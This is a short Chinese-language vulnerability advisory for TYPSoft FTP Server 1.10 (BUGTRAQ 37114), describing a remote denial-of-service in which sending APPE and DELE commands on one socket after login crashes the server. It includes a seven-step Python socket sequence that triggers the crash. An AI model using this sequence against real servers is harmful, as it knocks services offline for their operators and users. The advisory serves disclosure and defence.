TYPSoft FTP Server APPE和DELE命令远程拒绝服务漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

BUGTRAQ ID: 37114 TYPSoft FTP Server是一款简单易用的FTP服务程序。 TYPSoft FTP Server中存在拒绝服务漏洞,用户登录到服务器后对同一个套接字连接同时使用APPE和DELE命令就会导致服务器崩溃: 1.sock.connect((hostname, 21)) 2.sock.send("user %s\r\n" %username) 3.sock.send("pass %s\r\n" %passwd) 4.sock.send("PORT 127,0,0,1,122,107\r\n") 5.sock.send("APPE "+ test_string +"\r\n") 6.sock.send("DELE "+ test_string +"\r\n") 7.sock.close() TYPSoft TYPSoft FTP Server 1.10 厂商补丁: TYPSoft ------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://en.typsoft.com/

0%
暂无可用Exp或PoC
当前有0条受影响产品信息